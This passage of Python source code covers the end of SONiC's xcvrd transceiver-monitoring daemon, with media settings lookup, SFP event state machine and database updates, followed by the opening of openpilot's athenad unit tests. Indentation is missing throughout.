helper_logger.log_error("This functionality is currently not implemented for this platform")
sys.exit(NOT_IMPLEMENTED_ERROR)
# recover missing sfp table entries if any
def recover_missing_sfp_table_entries(sfp_util, int_tbl, status_tbl, stop_event):
transceiver_dict = {}
logical_port_list = sfp_util.logical
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = sfp_util.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
keys = int_tbl[asic_index].getKeys()
if logical_port_name not in keys and not detect_port_in_error_status(logical_port_name, status_tbl[asic_index]):
post_port_sfp_info_to_db(logical_port_name, int_tbl[asic_index], transceiver_dict, stop_event)
def check_port_in_range(range_str, physical_port):
RANGE_SEPARATOR = '-'
range_list = range_str.split(RANGE_SEPARATOR)
start_num = int(range_list[0].strip())
end_num = int(range_list[1].strip())
if start_num <= physical_port <= end_num:
return True
return False
def get_media_settings_value(physical_port, key):
GLOBAL_MEDIA_SETTINGS_KEY = 'GLOBAL_MEDIA_SETTINGS'
PORT_MEDIA_SETTINGS_KEY = 'PORT_MEDIA_SETTINGS'
DEFAULT_KEY = 'Default'
RANGE_SEPARATOR = '-'
COMMA_SEPARATOR = ','
media_dict = {}
default_dict = {}
# Keys under global media settings can be a list or range or list of ranges
# of physical port numbers. Below are some examples
# 1-32
# 1,2,3,4,5
# 1-4,9-12
if GLOBAL_MEDIA_SETTINGS_KEY in g_dict:
for keys in g_dict[GLOBAL_MEDIA_SETTINGS_KEY]:
if COMMA_SEPARATOR in keys:
port_list = keys.split(COMMA_SEPARATOR)
for port in port_list:
if RANGE_SEPARATOR in port:
if check_port_in_range(port, physical_port):
media_dict = g_dict[GLOBAL_MEDIA_SETTINGS_KEY][keys]
break
elif str(physical_port) == port:
media_dict = g_dict[GLOBAL_MEDIA_SETTINGS_KEY][keys]
break
elif RANGE_SEPARATOR in keys:
if check_port_in_range(keys, physical_port):
media_dict = g_dict[GLOBAL_MEDIA_SETTINGS_KEY][keys]
# If there is a match in the global profile for a media type,
# fetch those values
if key[0] in media_dict:
return media_dict[key[0]]
elif key[1] in media_dict:
return media_dict[key[1]]
elif DEFAULT_KEY in media_dict:
default_dict = media_dict[DEFAULT_KEY]
media_dict = {}
if PORT_MEDIA_SETTINGS_KEY in g_dict:
for keys in g_dict[PORT_MEDIA_SETTINGS_KEY]:
if int(keys) == physical_port:
media_dict = g_dict[PORT_MEDIA_SETTINGS_KEY][keys]
break
if len(media_dict) == 0:
if len(default_dict) != 0:
return default_dict
else:
helper_logger.log_error("Error: No values for physical port '{}'".format(physical_port))
return {}
if key[0] in media_dict:
return media_dict[key[0]]
elif key[1] in media_dict:
return media_dict[key[1]]
elif DEFAULT_KEY in media_dict:
return media_dict[DEFAULT_KEY]
elif len(default_dict) != 0:
return default_dict
else:
if len(default_dict) != 0:
return default_dict
return {}
def get_media_settings_key(physical_port, transceiver_dict):
sup_compliance_str = '10/40G Ethernet Compliance Code'
sup_len_str = 'Length Cable Assembly(m)'
vendor_name_str = transceiver_dict[physical_port]['manufacturer']
vendor_pn_str = transceiver_dict[physical_port]['model']
vendor_key = vendor_name_str.upper() + '-' + vendor_pn_str
media_len = ''
if transceiver_dict[physical_port]['cable_type'] == sup_len_str:
media_len = transceiver_dict[physical_port]['cable_length']
media_compliance_dict_str = transceiver_dict[physical_port]['specification_compliance']
media_compliance_code = ''
media_type = ''
media_key = ''
media_compliance_dict = {}
try:
if _wrapper_get_sfp_type(physical_port) == 'QSFP_DD':
media_compliance_code = media_compliance_dict_str
else:
media_compliance_dict = ast.literal_eval(media_compliance_dict_str)
if sup_compliance_str in media_compliance_dict:
media_compliance_code = media_compliance_dict[sup_compliance_str]
except ValueError as e:
helper_logger.log_error("Invalid value for port {} 'specification_compliance': {}".format(physical_port, media_compliance_dict_str))
media_type = transceiver_dict[physical_port]['type_abbrv_name']
if len(media_type) != 0:
media_key += media_type
if len(media_compliance_code) != 0:
media_key += '-' + media_compliance_code
if _wrapper_get_sfp_type(physical_port) == 'QSFP_DD':
if media_compliance_code == "passive_copper_media_interface":
if len(media_len) != 0:
media_key += '-' + media_len + 'M'
else:
if len(media_len) != 0:
media_key += '-' + media_len + 'M'
else:
media_key += '-' + '*'
return [vendor_key, media_key]
def get_media_val_str_from_dict(media_dict):
LANE_STR = 'lane'
LANE_SEPARATOR = ','
media_str = ''
tmp_dict = {}
for keys in media_dict:
lane_num = int(keys.strip()[len(LANE_STR):])
tmp_dict[lane_num] = media_dict[keys]
for key in range(0, len(tmp_dict)):
media_str += tmp_dict[key]
if key != list(tmp_dict.keys())[-1]:
media_str += LANE_SEPARATOR
return media_str
def get_media_val_str(num_logical_ports, lane_dict, logical_idx):
LANE_STR = 'lane'
logical_media_dict = {}
num_lanes_on_port = len(lane_dict)
# The physical ports has more than one logical port meaning it is
# in breakout mode. So fetch the corresponding lanes from the file
media_val_str = ''
if (num_logical_ports > 1) and \
(num_lanes_on_port >= num_logical_ports):
num_lanes_per_logical_port = num_lanes_on_port//num_logical_ports
start_lane = logical_idx * num_lanes_per_logical_port
for lane_idx in range(start_lane, start_lane +
num_lanes_per_logical_port):
lane_idx_str = LANE_STR + str(lane_idx)
logical_lane_idx_str = LANE_STR + str(lane_idx - start_lane)
logical_media_dict[logical_lane_idx_str] = lane_dict[lane_idx_str]
media_val_str = get_media_val_str_from_dict(logical_media_dict)
else:
media_val_str = get_media_val_str_from_dict(lane_dict)
return media_val_str
def notify_media_setting(logical_port_name, transceiver_dict,
app_port_tbl):
if len(media_settings) == 0:
return
ganged_port = False
ganged_member_num = 1
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("Error: No physical ports found for logical port '{}'".format(logical_port_name))
return PHYSICAL_PORT_NOT_EXIST
if len(physical_port_list) > 1:
ganged_port = True
for physical_port in physical_port_list:
logical_port_list = platform_sfputil.get_physical_to_logical(physical_port)
num_logical_ports = len(logical_port_list)
logical_idx = logical_port_list.index(logical_port_name)
if not _wrapper_get_presence(physical_port):
helper_logger.log_info("Media {} presence not detected during notify".format(physical_port))
continue
if physical_port not in transceiver_dict:
helper_logger.log_error("Media {} eeprom not populated in transceiver dict".format(physical_port))
continue
port_name = get_physical_port_name(logical_port_name,
ganged_member_num, ganged_port)
ganged_member_num += 1
key = get_media_settings_key(physical_port, transceiver_dict)
media_dict = get_media_settings_value(physical_port, key)
if len(media_dict) == 0:
helper_logger.log_error("Error in obtaining media setting for {}".format(logical_port_name))
return
fvs = swsscommon.FieldValuePairs(len(media_dict))
index = 0
for media_key in media_dict:
if type(media_dict[media_key]) is dict:
media_val_str = get_media_val_str(num_logical_ports,
media_dict[media_key],
logical_idx)
else:
media_val_str = media_dict[media_key]
fvs[index] = (str(media_key), str(media_val_str))
index += 1
app_port_tbl.set(port_name, fvs)
def waiting_time_compensation_with_sleep(time_start, time_to_wait):
time_now = time.time()
time_diff = time_now - time_start
if time_diff < time_to_wait:
time.sleep(time_to_wait - time_diff)
# Update port SFP status table on receiving SFP change event
def update_port_transceiver_status_table(logical_port_name, status_tbl, status):
fvs = swsscommon.FieldValuePairs([('status', status)])
status_tbl.set(logical_port_name, fvs)
# Delete port from SFP status table
def delete_port_from_status_table(logical_port_name, status_tbl):
status_tbl._del(logical_port_name)
# Check whether port in error status
def detect_port_in_error_status(logical_port_name, status_tbl):
rec, fvp = status_tbl.get(logical_port_name)
if rec:
status_dict = dict(fvp)
if status_dict['status'] in errors_block_eeprom_reading:
return True
else:
return False
else:
return False
# Init TRANSCEIVER_STATUS table
def init_port_sfp_status_tbl(stop_event=threading.Event()):
# Connect to STATE_DB and create transceiver status table
state_db, status_tbl = {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
# Init TRANSCEIVER_STATUS table
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
if stop_event.is_set():
break
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
physical_port_list = logical_port_name_to_physical_port_list(logical_port_name)
if physical_port_list is None:
helper_logger.log_error("No physical ports found for logical port '{}'".format(logical_port_name))
update_port_transceiver_status_table(logical_port_name, status_tbl[asic_index], SFP_STATUS_REMOVED)
for physical_port in physical_port_list:
if stop_event.is_set():
break
if not _wrapper_get_presence(physical_port):
update_port_transceiver_status_table(logical_port_name, status_tbl[asic_index], SFP_STATUS_REMOVED)
else:
update_port_transceiver_status_table(logical_port_name, status_tbl[asic_index], SFP_STATUS_INSERTED)
#
# Helper classes ===============================================================
#
# Thread wrapper class to update dom info periodically
class DomInfoUpdateTask(object):
def __init__(self):
self.task_thread = None
self.task_stopping_event = threading.Event()
def task_worker(self, y_cable_presence):
helper_logger.log_info("Start DOM monitoring loop")
# Connect to STATE_DB and create transceiver dom info table
state_db, dom_tbl, status_tbl = {}, {}, {}
mux_tbl = {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
# Start loop to update dom info in DB periodically
while not self.task_stopping_event.wait(DOM_INFO_UPDATE_PERIOD_SECS):
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
if not detect_port_in_error_status(logical_port_name, status_tbl[asic_index]):
post_port_dom_info_to_db(logical_port_name, dom_tbl[asic_index], self.task_stopping_event)
post_port_dom_threshold_info_to_db(logical_port_name, dom_tbl[asic_index], self.task_stopping_event)
if y_cable_presence[0] is True:
y_cable_helper.check_identifier_presence_and_update_mux_info_entry(state_db, mux_tbl, asic_index, logical_port_name)
helper_logger.log_info("Stop DOM monitoring loop")
def task_run(self, y_cable_presence):
if self.task_stopping_event.is_set():
return
self.task_thread = threading.Thread(target=self.task_worker, args=(y_cable_presence,))
self.task_thread.start()
def task_stop(self):
self.task_stopping_event.set()
self.task_thread.join()
# Process wrapper class to update sfp state info periodically
class SfpStateUpdateTask(object):
def __init__(self):
self.task_process = None
self.task_stopping_event = multiprocessing.Event()
def _mapping_event_from_change_event(self, status, port_dict):
"""
mapping from what get_transceiver_change_event returns to event defined in the state machine
the logic is pretty straightforword
"""
if status:
if bool(port_dict):
event = NORMAL_EVENT
else:
event = SYSTEM_BECOME_READY
# here, a simple timeout event whose port_dict is empty is mapped
# into a SYSTEM_BECOME_READY event so that it can be handled
port_dict[EVENT_ON_ALL_SFP] = SYSTEM_BECOME_READY
else:
if EVENT_ON_ALL_SFP in port_dict.keys():
event = port_dict[EVENT_ON_ALL_SFP]
else:
# this should not happen. just for protection
event = SYSTEM_FAIL
port_dict[EVENT_ON_ALL_SFP] = SYSTEM_FAIL
helper_logger.log_debug("mapping from {} {} to {}".format(status, port_dict, event))
return event
def task_worker(self, stopping_event, sfp_error_event, y_cable_presence):
helper_logger.log_info("Start SFP monitoring loop")
transceiver_dict = {}
# Connect to STATE_DB and create transceiver dom/sfp info tables
state_db, appl_db, int_tbl, dom_tbl, status_tbl, app_port_tbl = {}, {}, {}, {}, {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
int_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_INFO_TABLE)
dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
# Connect to APPL_DB to notify Media notifications
appl_db[asic_id] = daemon_base.db_connect("APPL_DB", namespace)
app_port_tbl[asic_id] = swsscommon.ProducerStateTable(appl_db[asic_id], swsscommon.APP_PORT_TABLE_NAME)
# Start main loop to listen to the SFP change event.
# The state migrating sequence:
# 1. When the system starts, it is in "INIT" state, calling get_transceiver_change_event
# with RETRY_PERIOD_FOR_SYSTEM_READY_MSECS as timeout for before reach RETRY_TIMES_FOR_SYSTEM_READY
# times, otherwise it will transition to "EXIT" state
# 2. Once 'system_become_ready' returned, the system enters "SYSTEM_READY" state and starts to monitor
# the insertion/removal event of all the SFP modules.
# In this state, receiving any system level event will be treated as an error and cause transition to
# "INIT" state
# 3. When system back to "INIT" state, it will continue to handle system fail event, and retry until reach
# RETRY_TIMES_FOR_SYSTEM_READY times, otherwise it will transition to "EXIT" state
# states definition
# - Initial state: INIT, before received system ready or a normal event
# - Final state: EXIT
# - other state: NORMAL, after has received system-ready or a normal event
# events definition
# - SYSTEM_NOT_READY
# - SYSTEM_BECOME_READY
# -
# - NORMAL_EVENT
# - sfp insertion/removal
# - timeout returned by sfputil.get_change_event with status = true
# - SYSTEM_FAIL
# State transition:
# 1. SYSTEM_NOT_READY
# - INIT
# - retry < RETRY_TIMES_FOR_SYSTEM_READY
# retry ++
# - else
# max retry reached, treat as fatal, transition to EXIT
# - NORMAL
# Treat as an error, transition to INIT
# 2. SYSTEM_BECOME_READY
# - INIT
# transition to NORMAL
# - NORMAL
# log the event
# nop
# 3. NORMAL_EVENT
# - INIT (for the vendors who don't implement SYSTEM_BECOME_READY)
# transition to NORMAL
# handle the event normally
# - NORMAL
# handle the event normally
# 4. SYSTEM_FAIL
# - INIT
# - retry < RETRY_TIMES_FOR_SYSTEM_READY
# retry ++
# - else
# max retry reached, treat as fatal, transition to EXIT
# - NORMAL
# Treat as an error, transition to INIT
# State event next state
# INIT SYSTEM NOT READY INIT / EXIT
# INIT SYSTEM FAIL INIT / EXIT
# INIT SYSTEM BECOME READY NORMAL
# NORMAL SYSTEM BECOME READY NORMAL
# NORMAL SYSTEM FAIL INIT
# INIT/NORMAL NORMAL EVENT NORMAL
# NORMAL SYSTEM NOT READY INIT
# EXIT -
retry = 0
timeout = RETRY_PERIOD_FOR_SYSTEM_READY_MSECS
state = STATE_INIT
while not stopping_event.is_set():
next_state = state
time_start = time.time()
status, port_dict = _wrapper_get_transceiver_change_event(timeout)
if not port_dict:
continue
helper_logger.log_debug("Got event {} {} in state {}".format(status, port_dict, state))
event = self._mapping_event_from_change_event(status, port_dict)
if event == SYSTEM_NOT_READY:
if state == STATE_INIT:
# system not ready, wait and retry
if retry >= RETRY_TIMES_FOR_SYSTEM_READY:
helper_logger.log_error("System failed to get ready in {} secs or received system error. Exiting...".format(
(RETRY_PERIOD_FOR_SYSTEM_READY_MSECS/1000)*RETRY_TIMES_FOR_SYSTEM_READY))
next_state = STATE_EXIT
sfp_error_event.set()
else:
retry = retry + 1
# get_transceiver_change_event may return immediately,
# we want the retry expired in expected time period,
# So need to calc the time diff,
# if time diff less that the pre-defined waiting time,
# use sleep() to complete the time.
time_now = time.time()
time_diff = time_now - time_start
if time_diff < RETRY_PERIOD_FOR_SYSTEM_READY_MSECS/1000:
time.sleep(RETRY_PERIOD_FOR_SYSTEM_READY_MSECS/1000 - time_diff)
elif state == STATE_NORMAL:
helper_logger.log_error("Got system_not_ready in normal state, treat as fatal. Exiting...")
next_state = STATE_EXIT
else:
next_state = STATE_EXIT
elif event == SYSTEM_BECOME_READY:
if state == STATE_INIT:
next_state = STATE_NORMAL
helper_logger.log_info("Got system_become_ready in init state, transition to normal state")
elif state == STATE_NORMAL:
helper_logger.log_info("Got system_become_ready in normal state, ignored")
else:
next_state = STATE_EXIT
elif event == NORMAL_EVENT:
if state == STATE_NORMAL or state == STATE_INIT:
if state == STATE_INIT:
next_state = STATE_NORMAL
# this is the originally logic that handled the transceiver change event
# this can be reached in two cases:
# 1. the state has been normal before got the event
# 2. the state was init and transition to normal after got the event.
# this is for the vendors who don't implement "system_not_ready/system_becom_ready" logic
for key, value in port_dict.items():
logical_port_list = platform_sfputil.get_physical_to_logical(int(key))
if logical_port_list is None:
helper_logger.log_warning("Got unknown FP port index {}, ignored".format(key))
continue
for logical_port in logical_port_list:
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port))
continue
if value == SFP_STATUS_INSERTED:
helper_logger.log_info("Got SFP inserted event")
# A plugin event will clear the error state.
update_port_transceiver_status_table(
logical_port, status_tbl[asic_index], SFP_STATUS_INSERTED)
helper_logger.log_info("receive plug in and update port sfp status table.")
rc = post_port_sfp_info_to_db(logical_port, int_tbl[asic_index], transceiver_dict)
# If we didn't get the sfp info, assuming the eeprom is not ready, give a try again.
if rc == SFP_EEPROM_NOT_READY:
helper_logger.log_warning("SFP EEPROM is not ready. One more try...")
time.sleep(TIME_FOR_SFP_READY_SECS)
post_port_sfp_info_to_db(logical_port, int_tbl[asic_index], transceiver_dict)
post_port_dom_info_to_db(logical_port, dom_tbl[asic_index])
post_port_dom_threshold_info_to_db(logical_port, dom_tbl[asic_index])
notify_media_setting(logical_port, transceiver_dict, app_port_tbl[asic_index])
transceiver_dict.clear()
elif value == SFP_STATUS_REMOVED:
helper_logger.log_info("Got SFP removed event")
update_port_transceiver_status_table(
logical_port, status_tbl[asic_index], SFP_STATUS_REMOVED)
helper_logger.log_info("receive plug out and pdate port sfp status table.")
del_port_sfp_dom_info_from_db(logical_port, int_tbl[asic_index], dom_tbl[asic_index])
elif value in errors_block_eeprom_reading:
helper_logger.log_info("Got SFP Error event")
# Add port to error table to stop accessing eeprom of it
# If the port already in the error table, the stored error code will
# be updated to the new one.
update_port_transceiver_status_table(logical_port, status_tbl[asic_index], value)
helper_logger.log_info("receive error update port sfp status table.")
# In this case EEPROM is not accessible, so remove the DOM info
# since it will be outdated if long time no update.
# but will keep the interface info in the DB since it static.
del_port_sfp_dom_info_from_db(logical_port, None, dom_tbl[asic_index])
else:
# SFP return unkown event, just ignore for now.
helper_logger.log_warning("Got unknown event {}, ignored".format(value))
continue
# Since ports could be connected to a mux cable, if there is a change event process the change for being on a Y cable Port
y_cable_helper.change_ports_status_for_y_cable_change_event(
port_dict, y_cable_presence, stopping_event)
else:
next_state = STATE_EXIT
elif event == SYSTEM_FAIL:
if state == STATE_INIT:
# To overcome a case that system is only temporarily not available,
# when get system fail event will wait and retry for a certain period,
# if system recovered in this period xcvrd will transit to INIT state
# and continue run, if can not recover then exit.
if retry >= RETRY_TIMES_FOR_SYSTEM_FAIL:
helper_logger.log_error("System failed to recover in {} secs. Exiting...".format(
(RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS/1000)*RETRY_TIMES_FOR_SYSTEM_FAIL))
next_state = STATE_EXIT
sfp_error_event.set()
else:
retry = retry + 1
waiting_time_compensation_with_sleep(time_start, RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS/1000)
elif state == STATE_NORMAL:
helper_logger.log_error("Got system_fail in normal state, treat as error, transition to INIT...")
next_state = STATE_INIT
timeout = RETRY_PERIOD_FOR_SYSTEM_FAIL_MSECS
retry = 0
else:
next_state = STATE_EXIT
else:
helper_logger.log_warning("Got unknown event {} on state {}.".format(event, state))
if next_state != state:
helper_logger.log_debug("State transition from {} to {}".format(state, next_state))
state = next_state
if next_state == STATE_EXIT:
os.kill(os.getppid(), signal.SIGTERM)
break
elif next_state == STATE_NORMAL:
timeout = 0
helper_logger.log_info("Stop SFP monitoring loop")
def task_run(self, sfp_error_event, y_cable_presence):
if self.task_stopping_event.is_set():
return
self.task_process = multiprocessing.Process(target=self.task_worker, args=(
self.task_stopping_event, sfp_error_event, y_cable_presence))
self.task_process.start()
def task_stop(self):
self.task_stopping_event.set()
os.kill(self.task_process.pid, signal.SIGKILL)
#
# Daemon =======================================================================
#
class DaemonXcvrd(daemon_base.DaemonBase):
def __init__(self, log_identifier):
super(DaemonXcvrd, self).__init__(log_identifier)
self.timeout = XCVRD_MAIN_THREAD_SLEEP_SECS
self.num_asics = multi_asic.get_num_asics()
self.stop_event = threading.Event()
self.sfp_error_event = multiprocessing.Event()
self.y_cable_presence = [False]
# Signal handler
def signal_handler(self, sig, frame):
if sig == signal.SIGHUP:
self.log_info("Caught SIGHUP - ignoring...")
elif sig == signal.SIGINT:
self.log_info("Caught SIGINT - exiting...")
self.stop_event.set()
elif sig == signal.SIGTERM:
self.log_info("Caught SIGTERM - exiting...")
self.stop_event.set()
else:
self.log_warning("Caught unhandled signal '" + sig + "'")
# Wait for port config is done
def wait_for_port_config_done(self, namespace):
# Connect to APPL_DB and subscribe to PORT table notifications
appl_db = daemon_base.db_connect("APPL_DB", namespace=namespace)
sel = swsscommon.Select()
sst = swsscommon.SubscriberStateTable(appl_db, swsscommon.APP_PORT_TABLE_NAME)
sel.addSelectable(sst)
# Make sure this daemon started after all port configured
while not self.stop_event.is_set():
(state, c) = sel.select(SELECT_TIMEOUT_MSECS)
if state == swsscommon.Select.TIMEOUT:
continue
if state != swsscommon.Select.OBJECT:
self.log_warning("sel.select() did not return swsscommon.Select.OBJECT")
continue
(key, op, fvp) = sst.pop()
if key in ["PortConfigDone", "PortInitDone"]:
break
def load_media_settings(self):
global media_settings
global g_dict
(platform_path, hwsku_path) = device_info.get_paths_to_platform_and_hwsku_dirs()
media_settings_file_path = os.path.join(platform_path, "media_settings.json")
if not os.path.isfile(media_settings_file_path):
self.log_info("xcvrd: No media file exists")
return {}
media_file = open(media_settings_file_path, "r")
media_settings = media_file.read()
g_dict = json.loads(media_settings)
# Initialize daemon
def init(self):
global platform_sfputil
global platform_chassis
self.log_info("Start daemon init...")
# Load new platform api class
try:
import sonic_platform.platform
import sonic_platform_base.sonic_sfp.sfputilhelper
platform_chassis = sonic_platform.platform.Platform().get_chassis()
self.log_info("chassis loaded {}".format(platform_chassis))
# we have to make use of sfputil for some features
# even though when new platform api is used for all vendors.
# in this sense, we treat it as a part of new platform api.
# we have already moved sfputil to sonic_platform_base
# which is the root of new platform api.
platform_sfputil = sonic_platform_base.sonic_sfp.sfputilhelper.SfpUtilHelper()
except Exception as e:
self.log_warning("Failed to load chassis due to {}".format(repr(e)))
# Load platform specific sfputil class
if platform_chassis is None or platform_sfputil is None:
try:
platform_sfputil = self.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)
except Exception as e:
self.log_error("Failed to load sfputil: {}".format(str(e)), True)
sys.exit(SFPUTIL_LOAD_ERROR)
if multi_asic.is_multi_asic():
# Load the namespace details first from the database_global.json file.
swsscommon.SonicDBConfig.initializeGlobalConfig()
# Load port info
try:
if multi_asic.is_multi_asic():
# For multi ASIC platforms we pass DIR of port_config_file_path and the number of asics
(platform_path, hwsku_path) = device_info.get_paths_to_platform_and_hwsku_dirs()
platform_sfputil.read_all_porttab_mappings(hwsku_path, self.num_asics)
else:
# For single ASIC platforms we pass port_config_file_path and the asic_inst as 0
port_config_file_path = device_info.get_path_to_port_config_file()
platform_sfputil.read_porttab_mappings(port_config_file_path, 0)
except Exception as e:
self.log_error("Failed to read port info: {}".format(str(e)), True)
sys.exit(PORT_CONFIG_LOAD_ERROR)
# Connect to STATE_DB and create transceiver dom/sfp info tables
state_db, self.int_tbl, self.dom_tbl, self.status_tbl = {}, {}, {}, {}
# Get the namespaces in the platform
namespaces = multi_asic.get_front_end_namespaces()
for namespace in namespaces:
asic_id = multi_asic.get_asic_index_from_namespace(namespace)
state_db[asic_id] = daemon_base.db_connect("STATE_DB", namespace)
self.int_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_INFO_TABLE)
self.dom_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_DOM_SENSOR_TABLE)
self.status_tbl[asic_id] = swsscommon.Table(state_db[asic_id], TRANSCEIVER_STATUS_TABLE)
self.load_media_settings()
warmstart = swsscommon.WarmStart()
warmstart.initialize("xcvrd", "pmon")
warmstart.checkWarmStart("xcvrd", "pmon", False)
is_warm_start = warmstart.isWarmStart()
# Make sure this daemon started after all port configured
self.log_info("Wait for port config is done")
for namespace in namespaces:
self.wait_for_port_config_done(namespace)
# Post all the current interface dom/sfp info to STATE_DB
self.log_info("Post all port DOM/SFP info to DB")
post_port_sfp_dom_info_to_db(is_warm_start, self.stop_event)
# Init port sfp status table
self.log_info("Init port sfp status table")
init_port_sfp_status_tbl(self.stop_event)
# Init port y_cable status table
y_cable_helper.init_ports_status_for_y_cable(
platform_sfputil, platform_chassis, self.y_cable_presence, self.stop_event)
# Deinitialize daemon
def deinit(self):
self.log_info("Start daemon deinit...")
# Delete all the information from DB and then exit
logical_port_list = platform_sfputil.logical
for logical_port_name in logical_port_list:
# Get the asic to which this port belongs
asic_index = platform_sfputil.get_asic_id_for_logical_port(logical_port_name)
if asic_index is None:
logger.log_warning("Got invalid asic index for {}, ignored".format(logical_port_name))
continue
del_port_sfp_dom_info_from_db(logical_port_name, self.int_tbl[asic_index], self.dom_tbl[asic_index])
delete_port_from_status_table(logical_port_name, self.status_tbl[asic_index])
if self.y_cable_presence[0] is True:
y_cable_helper.delete_ports_status_for_y_cable()
# Run daemon
def run(self):
self.log_info("Starting up...")
# Start daemon initialization sequence
self.init()
# Start the dom sensor info update thread
dom_info_update = DomInfoUpdateTask()
dom_info_update.task_run(self.y_cable_presence)
# Start the sfp state info update process
sfp_state_update = SfpStateUpdateTask()
sfp_state_update.task_run(self.sfp_error_event, self.y_cable_presence)
# Start the Y-cable state info update process if Y cable presence established
y_cable_state_update = None
if self.y_cable_presence[0] is True:
y_cable_state_update = y_cable_helper.YCableTableUpdateTask()
y_cable_state_update.task_run()
# Start main loop
self.log_info("Start daemon main loop")
while not self.stop_event.wait(self.timeout):
# Check the integrity of the sfp info table and recover the missing entries if any
recover_missing_sfp_table_entries(platform_sfputil, self.int_tbl, self.status_tbl, self.stop_event)
self.log_info("Stop daemon main loop")
# Stop the dom sensor info update thread
dom_info_update.task_stop()
# Stop the sfp state info update process
sfp_state_update.task_stop()
# Stop the Y-cable state info update process
if self.y_cable_presence[0] is True:
y_cable_state_update.task_stop()
# Start daemon deinitialization sequence
self.deinit()
self.log_info("Shutting down...")
if self.sfp_error_event.is_set():
sys.exit(SFP_SYSTEM_ERROR)
#
# Main =========================================================================
#
# This is our main entry point for xcvrd script
def main():
xcvrd = DaemonXcvrd(SYSLOG_IDENTIFIER)
xcvrd.run()
if __name__ == '__main__':
main()
|
test_athenad.py
|
#!/usr/bin/env python3
import json
import os
import requests
import shutil
import tempfile
import time
import threading
import queue
import unittest
from datetime import datetime, timedelta
from multiprocessing import Process
from pathlib import Path
from unittest import mock
from websocket import ABNF
from websocket._exceptions import WebSocketConnectionClosedException
from system import swaglog
from selfdrive.athena import athenad
from selfdrive.athena.athenad import MAX_RETRY_COUNT, dispatcher
from selfdrive.athena.tests.helpers import MockWebsocket, MockParams, MockApi, EchoSocket, with_http_server
from cereal import messaging
class TestAthenadMethods(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.SOCKET_PORT = 45454
athenad.Params = MockParams
athenad.ROOT = tempfile.mkdtemp()
athenad.SWAGLOG_DIR = swaglog.SWAGLOG_DIR = tempfile.mkdtemp()
athenad.Api = MockApi
athenad.LOCAL_PORT_WHITELIST = {cls.SOCKET_PORT}
def setUp(self):
MockParams.restore_defaults()
athenad.upload_queue = queue.Queue()
athenad.cur_upload_items.clear()
athenad.cancelled_uploads.clear()
for i in os.listdir(athenad.ROOT):
p = os.path.join(athenad.ROOT, i)
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.unlink(p)
def wait_for_upload(self):
now = time.time()
while time.time() - now < 5:
if athenad.upload_queue.qsize() == 0:
break
def test_echo(self):
assert dispatcher["echo"]("bob") == "bob"
def test_getMessage(self):
with self.assertRaises(TimeoutError) as _:
dispatcher["getMessage"]("controlsState")
def send_deviceState():
messaging.context = messaging.Context()
pub_sock = messaging.pub_sock("deviceState")
start = time.time()
while time.time() - start < 1:
msg = messaging.new_message('deviceState')
pub_sock.send(msg.to_bytes())
time.sleep(0.01)
p = Process(target=send_deviceState)
p.start()
time.sleep(0.1)
try:
deviceState = dispatcher["getMessage"]("deviceState")
assert deviceState['deviceState']
finally:
p.terminate()
def test_listDataDirectory(self):
route = '2021-03-29--13-32-47'
segments = [0, 1, 2, 3, 11]
filenames = ['qlog', 'qcamera.ts', 'rlog', 'fcamera.hevc', 'ecamera.hevc', 'dcamera.hevc']
files = [f'{route}--{s}/{f}' for s in segments for f in filenames]
for file in files:
fn = os.path.join(athenad.ROOT, file)
os.makedirs(os.path.dirname(fn), exist_ok=True)
Path(fn).touch()
resp = dispatcher["listDataDirectory"]()
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, files)
resp = dispatcher["listDataDirectory"](f'{route}--123')
self.assertCountEqual(resp, [])
prefix = f'{route}'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
self.assertTrue(resp, 'list empty!')
self.assertCountEqual(resp, expected)
prefix = f'{route}--1'
expected = filter(lambda f: f.startswith(prefix), files)
resp = dispatcher["listDataDirectory"](prefix)
